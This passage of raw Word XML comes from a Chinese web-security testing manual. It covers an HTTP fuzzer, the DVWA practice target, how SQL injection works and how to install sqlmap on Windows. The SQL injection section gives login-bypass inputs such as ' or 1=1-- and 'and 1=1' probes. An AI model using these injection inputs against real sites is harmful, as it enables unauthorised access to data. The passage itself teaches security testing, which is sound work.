            <wp:docPr id="126" name="图片 126" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\D~Z]4(3P%9D~H@BY_QW)$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hang\Documents\Tencent Files\813940732\Image\C2C\D~Z]4(3P%9D~H@BY_QW)$Y7.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08365" cy="4294932"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="36" w:name="_Toc499884712"/>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Fuzzer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞测试工具，用于批量数据自动提交，并测试出正确性的数据。与Burp中的intruder功能一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1）点击右上方的ADD Generator添加字典，共包含6种字典。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FD2A042" wp14:editId="4E5B0108">
            <wp:extent cx="5276850" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="127" name="图片 127" descr="C:\Users\hbhang\AppData\Roaming\Tencent\Users\813940732\QQ\WinTemp\RichOle\T82~8}XJBJ5RJ`UEVF(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hang\AppData\Roaming\Tencent\Users\813940732\QQ\WinTemp\RichOle\T82~8}XJBJ5RJ`UEVF(A`RD.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CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个字典的配置如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14436FE4" wp14:editId="7A284B73">
            <wp:extent cx="5274310" cy="55519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5551970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2）在测试点击Insert into Request</w:t>
      </w:r>
      <w:r w:rsidRPr="003E6996">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76E381DF" wp14:editId="10FA3509">
            <wp:extent cx="6084561" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="129" name="图片 129" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\GZZ3ZC[$3I]Z[T[VB1W{9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hang\Documents\Tencent Files\813940732\Image\C2C\GZZ3ZC[$3I]Z[T[VB1W{9X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84461" cy="2085941"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3）点击Start开始攻击。攻击结果包括Fuzzer的次数统计、Fuzzer的结果显示、Request、Response等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6996">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D158D5" wp14:editId="1F49D6EC">
            <wp:extent cx="6076950" cy="4381500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130" name="图片 130" descr="C:\Users\hbhang\Documents\Tencent Files\813940732\Image\C2C\44]5}CTEI_~E(_F_KH69{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bhang\Documents\Tencent Files\813940732\Image\C2C\44]5}CTEI_~E(_F_KH69{0U.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78374" cy="4382527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF3573" w:rsidRPr="003E6996" w:rsidRDefault="00CF3573" w:rsidP="00CF3573">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc496014419"/>
      <w:bookmarkStart w:id="38" w:name="_Toc499884713"/>
      <w:r w:rsidRPr="00515B74">
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具解析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。支持很多数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DVWA靶机的安装步骤参照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>介绍</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>章节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc496014420"/>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="40" w:name="_Toc499884714"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql注入攻击原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在进行sqlmap注入案例之前，先需要了解下sql注入的原理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、先</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>看一下普通的数据库查询语句。如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00362D2A" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00362D2A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>举例1：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>$sql = “SELECT * FROM `xxxx` WHERE `id` = ‘$id’ ORDER BY id ASC”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>这是一条普通的查询语句。为了让程序能够通过get 或 post方式传参进行动态查询，一般都会通过在SQL语句中加入变量的方式进行查询；即上面语句中的变量”$id”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>一般来说，PHP程序员都会使用$_GET[”]、$_REQUEST[”]等方式获取url中的传参。这样一来，便给了黑客可乘之机。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>举个例子，上面这条语句中如果对应的url为 www.</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">.com/index.php?id=1 ， 那么程序语句实际上之行为：$sql = “SELECT * FROM `xxxx` WHERE `id` = 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t>ORDER BY id ASC”;（确实，这样是没问题的）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>再举个例子，如果这条语句中对应的url为www.</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>.com/index.php?id=1 and 1=1，那么程序语句已经变成了 $sql = “SELECT * FROM `xxxx` WHERE `id` = 1 and 1=1 ORDER BY id ASC”;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>因为1=1是true</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以将直接跳过认证页面显示id=1的相关信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00362D2A" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00362D2A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>举例2：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>假如我们有一个users表，里面有两个字段username和password。在我们的java代码中我们初学者都习惯用sql拼接的方式进行用户验证。比如："select id from users where username = '"+username +"' and password = '" + password +"'" 这里的username和password都是我们存取从web表单获得的数据。下面我们来看一下一种简单的注入，如果我们在表单中username的输入框中输入' or 1=1-- ，password的表单中随便输入一些东西，假如这里输入123.此时我们所要执行的sql语句就变成了select id from users where username = '' or 1=1—</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>nd password = '123'，我们来看一下这个sql，因为1=1是true，后面 and password = '123'被注释掉了。所以这里完全跳过了sql验证</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>判断是否存在sql注入漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当输入的参数YY为整型时，通常abc.asp中SQL语句原貌大致如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>elect</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段=YY，所以可以用以下步骤</w:t>
      </w:r>
      <w:hyperlink r:id="rId244" w:history="1">
        <w:r w:rsidRPr="00362D2A">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>测试</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL注入是否存在。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一个单引号)，此时abc.ASP中的SQL语句变成了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>elect</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段=YY’，abc.asp运行异常；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）HTTP://xxx.xxx.xxx/abc.asp?p=YY</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1=1, abc.asp运行正常，而且与</w:t>
      </w:r>
      <w:hyperlink r:id="rId245" w:history="1">
        <w:r w:rsidRPr="00515B74">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>HTTP://xxx.xxx.xxx/abc.asp?p=YY</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行结果相同；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3）HTTP://xxx.xxx.xxx/abc.asp?p=YY</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1=2,</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc.asp运行异常；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果以上三步全面满足，abc.asp中一定存在SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc496014421"/>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="42" w:name="_Toc499884715"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows下的sqlmap的安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00261891" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc496014422"/>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00261891">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Python下载及安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:hyperlink r:id="rId246" w:history="1">
        <w:r w:rsidRPr="00515B74">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.python.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>Windows下推荐：2.7.13版本比较稳定：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:hyperlink r:id="rId247" w:history="1">
        <w:r w:rsidRPr="00515B74">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://www.python.org/downloads/release/python-2713/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>接下来，默认下一步直到结束安装。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>最后在CMD中输入python，看看有没有安装成功，如果出现一下画面说明安装成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EC6D2A7" wp14:editId="5C8C5657">
